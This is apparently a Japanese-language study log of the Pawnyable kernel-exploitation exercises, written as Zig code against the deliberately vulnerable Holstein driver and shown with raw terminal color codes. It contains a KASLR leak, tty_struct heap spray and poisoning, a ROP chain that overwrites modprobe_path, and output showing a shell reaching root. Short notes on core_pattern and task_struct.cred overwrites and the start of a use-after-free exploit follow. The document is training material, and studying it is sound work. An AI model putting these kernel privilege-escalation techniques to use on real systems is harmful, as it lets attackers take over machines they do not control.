�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mwriter�[0m�[1m�[37m.�[0m�[37mwriteAll�[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mtty_struct�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdriver�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mg_buf_addr�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mops�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mg_buf_addr�[0m�[1m�[37m �[0m�[1m�[37m})[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ops"�[0m�[1m�[37m)�[0m�[1m�[36m+�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ops"�[0m�[1m�[37m))]);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mbw�[0m�[1m�[37m.�[0m�[37mflush�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
ROPchainの内容は�[40m�[35m`modprobe_path`�[39m�[49m上書きするやつだ。
�[1m�[37mcat /proc/kallsyms �[0m�[1m�[37m|�[0m�[1m�[37m grep -e �[0m�[33m'modprobe_path'�[0m�[1m�[37m -e �[0m�[33m'swapgs_restore_regs_and_return_to_usermode'�[0m�[1m�[37m�[0m
�[1m�[37mffffffff81800e10 T swapgs_restore_regs_and_return_to_usermode�[0m
�[40m`CONFIG_KALLSYMS_ALL=y`�[49mがない場合、�[40m�[35m`modprobe_path`
�[39m�[49mは�[40m`/proc/kallsyms`�[49mに表示されない。
もちろんあるけど。
�[33mfrom�[0m�[1m�[37m �[0m�[1m�[37mpwn�[0m�[1m�[37m �[0m�[33mimport�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[37m�[0m
�[1m�[37mvmlinux�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mELF�[0m�[1m�[37m(�[0m�[33m"./vmlinux"�[0m�[1m�[37m)�[0m�[1m�[37m�[0m
�[37mhex�[0m�[1m�[37m(�[0m�[37mnext�[0m�[1m�[37m(�[0m�[1m�[37mvmlinux�[0m�[1m�[36m.�[0m�[1m�[37msearch�[0m�[1m�[37m(�[0m�[33m"/sbin/modprobe�[0m�[33m\0�[0m�[33m"�[0m�[1m�[37m)))�[0m�[1m�[37m�[0m
�[1m�[37m0xffffffff81e38180�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mPUSH_RDX_MOV_EBP_0x415bffd9_POP_RSP_POP_R13_POP_RBP�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff813a478a�[0m�[1m�[37m;�[0m�[1m�[37m �[0m�[33m// stack pivot gadget�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mMOV_ADDROF_RAX_RDI�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff8110840a�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mPOP_RAX�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff8113dd3c�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mPOP_RDI_ADD_CL_CL�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81032f59�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mKPTI_TRAMPOLINE�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81800e10�[0m�[1m�[36m+�[0m�[1m�[36m22�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81e38180�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mropchain�[0m�[1m�[37m(�[0m�[1m�[37mwriter�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37manytype�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mchain�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36mu64�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m// junk�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m// junk�[0m
�[1m�[37m �[0m�[1m�[37mPOP_RDI_ADD_CL_CL�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mreadInt�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"/tmp/x�[0m�[33m\x00\x00�[0m�[33m"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlittle�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mPOP_RAX�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mMOV_ADDROF_RAX_RDI�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mKPTI_TRAMPOLINE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m// junk�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m// junk�[0m
�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mmodprobePath�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muser_cs�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muser_rflags�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muser_rsp�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muser_ss�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mwriter�[0m�[1m�[37m.�[0m�[37mwriteAll�[0m�[1m�[37m(�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mchain�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mchain�[0m�[1m�[37m).�[0m�[1m�[37mlen�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37madjust_offsets�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mgadgets�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36m*�[0m�[1m�[36mu64�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mPUSH_RDX_MOV_EBP_0x415bffd9_POP_RSP_POP_R13_POP_RBP�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mMOV_ADDROF_RAX_RDI�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mPOP_RAX�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mPOP_RDI_ADD_CL_CL�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mKPTI_TRAMPOLINE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mgadgets�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mg�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mg�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m+=�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
またセグフォルートの問題が遭遇したので、�[40m�[35m`sigaction`�[39m�[49mを利用した。
�[1m�[36m<<�[0m�[1m�[37mpawnyable�[0m�[1m�[36m-�[0m�[1m�[37mlib�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mtty_struct�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mheap�[0m�[1m�[36m-�[0m�[1m�[37mspray�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk01�[0m�[1m�[36m-�[0m�[1m�[36m2�[0m�[1m�[36m-�[0m�[1m�[37mheap�[0m�[1m�[36m-�[0m�[1m�[37mleak�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk01�[0m�[1m�[36m-�[0m�[1m�[36m2�[0m�[1m�[36m-�[0m�[1m�[37mheap�[0m�[1m�[36m-�[0m�[1m�[37moverflow�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk01�[0m�[1m�[36m-�[0m�[1m�[36m2�[0m�[1m�[36m-�[0m�[1m�[37mrop�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37mcatchSigsegv�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mmodprobePath�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37msaveState�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mttys�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m100�[0m�[1m�[37m]�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mtty�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mtty�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mspray�[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m50�[0m�[1m�[37m]);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/holstein"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDWR�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mspray�[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m[�[0m�[1m�[36m50�[0m�[1m�[37m..]);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mleakKASLROffset�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Kernel base: 0x{s}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfmt�[0m�[1m�[37m.�[0m�[37mbytesToHex�[0m�[1m�[37m(�[0m�[37mbigEndianify�[0m�[1m�[37m(�[0m�[1m�[36m8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[36m+�[0m�[1m�[36m0xffffffff81000000�[0m�[1m�[37m))),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlower�[0m�[1m�[37m)});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37madjust_offsets�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mg_buf�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mleakGBuf�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"g_buf located at: 0x{s}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfmt�[0m�[1m�[37m.�[0m�[37mbytesToHex�[0m�[1m�[37m(�[0m�[37mbigEndianify�[0m�[1m�[37m(�[0m�[1m�[36m8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mg_buf�[0m�[1m�[37m)),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlower�[0m�[1m�[37m)});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mposionTTYStruct�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mg_buf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mropchain_addr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mg_buf�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_operations�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m10�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mtty�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mtty�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xdeadbeef�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mropchain_addr�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37mwhoami�[0m
�[1m�[37m./exploit�[0m
�[33m# execute bogus file�[0m�[1m�[37m�[0m
�[1m�[37m/tmp/unknown �[0m�[1m�[37m&�[0m�[1m�[37m> /tmp/null �[0m�[33m# /dev/null is priviledged�[0m�[1m�[37m�[0m
�[1m�[37mcat /tmp/whoisit�[0m
�[1m�[37mwhoami: unknown uid 1337�[0m
�[1m�[37m[INFO] Kernel base: 0xffffffffa0800000�[0m
�[1m�[37m[INFO] g_buf located at: 0xffff9f45c3108000�[0m
�[1m�[37m[INFO] You won!!�[0m
�[1m�[37mroot�[0m
(DIR) 完全なエクスプロイト
実はスタックピボットは不要だった:AAWガジェットを利用したら結果は同じだ。
他の方法
core_pattern [4]読み込み
コアダンプが発生した際、�[40m�[35m`core_pattern`�[39m�[49mで定義されたプログラッムが呼び出される
。�[40m�[35m`core_pattern`�[39m�[49mはFGKASLR影響しを受けないらしいから、特に便利っすね。
�[24m �[40m�[35m`task_struct.cred`�[39m�[49m読み書き
AARとAAWがあれば、ヒープ上から�[40m�[35m`task_struct.cred`�[39m�[49mを探し出して、それ
を0をセットする(�[40m�[35m`prctl`�[39m�[49mを利用すればプロセスの名は探すやすい値を変われば楽になる)
。
=== �[1m�[4mv3: Use after Free�[22m�[24m
�[1m�[37m10c10�[0m
�[1m�[37m< MODULE_DESCRIPTION("Holstein v2 - Vulnerable Kernel Driver for Pawnyable");�[0m
�[1m�[37m---�[0m
�[1m�[37m> MODULE_DESCRIPTION("Holstein v3 - Vulnerable Kernel Driver for Pawnyable");�[0m
�[1m�[37m21c21�[0m
�[1m�[37m< g_buf = kmalloc(BUFFER_SIZE, GFP_KERNEL);�[0m
�[1m�[37m---�[0m
�[1m�[37m> g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);�[0m
�[1m�[37m35a36,40�[0m
�[1m�[37m> if (count > BUFFER_SIZE) {�[0m
�[1m�[37m> printk(KERN_INFO "invalid buffer size\n");�[0m
�[1m�[37m> return -EINVAL;�[0m
�[1m�[37m> }�[0m
�[1m�[37m>�[0m
�[1m�[37m48a54,58�[0m
�[1m�[37m>�[0m
�[1m�[37m> if (count > BUFFER_SIZE) {�[0m
�[1m�[37m> printk(KERN_INFO "invalid buffer size\n");�[0m
�[1m�[37m> return -EINVAL;�[0m
�[1m�[37m> }�[0m
今回はオーバーフローがない。�[40m�[35m`g_buf`�[39m�[49mのUAFを悪用しよう。
攻撃の作戦は:
1. 2回で�[40m`/dev/holstein`�[49mを開く
2. 一つのfdを閉じる
3. 複数の�[40m�[35m`tty_struct`�[39m�[49mをスプレーする
4. 別のfdで構造体のいずれかを書き換える
�[33mfrom�[0m�[1m�[37m �[0m�[1m�[37mpwn�[0m�[1m�[37m �[0m�[33mimport�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[37m�[0m
�[1m�[37mvmlinux�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mELF�[0m�[1m�[37m(�[0m�[33m"./vmlinux"�[0m�[1m�[37m)�[0m�[1m�[37m�[0m
�[37mhex�[0m�[1m�[37m(�[0m�[37mnext�[0m�[1m�[37m(�[0m�[1m�[37mvmlinux�[0m�[1m�[36m.�[0m�[1m�[37msearch�[0m�[1m�[37m(�[0m�[33mb�[0m�[33m"core"�[0m�[1m�[36m.�[0m�[1m�[37mljust�[0m�[1m�[37m(�[0m�[1m�[36m128�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33mb�[0m�[33m"�[0m�[33m\0�[0m�[33m"�[0m�[1m�[37m))))�[0m�[1m�[37m�[0m
�[1m�[37m0xffffffff81eb12e0�[0m
�[1m�[36m<<�[0m�[1m�[37mpawnyable�[0m�[1m�[36m-�[0m�[1m�[37mlib�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mtty_struct�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mheap�[0m�[1m�[36m-�[0m�[1m�[37mspray�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mMOV_ADDROF_RDX_RCX�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff811b2d06�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mCORE_PATTERN�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81eb12e0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mleakKASLROffset�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mptmx_fops_addr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81c39c60�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ops"�[0m�[1m�[37m)�[0m�[1m�[36m+�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[37m@FieldType�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"ops"�[0m�[1m�[37m))]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[36m-�[0m�[1m�[36m8�[0m�[1m�[37m..]).�[0m�[1m�[36m*�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37mptmx_fops_addr�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
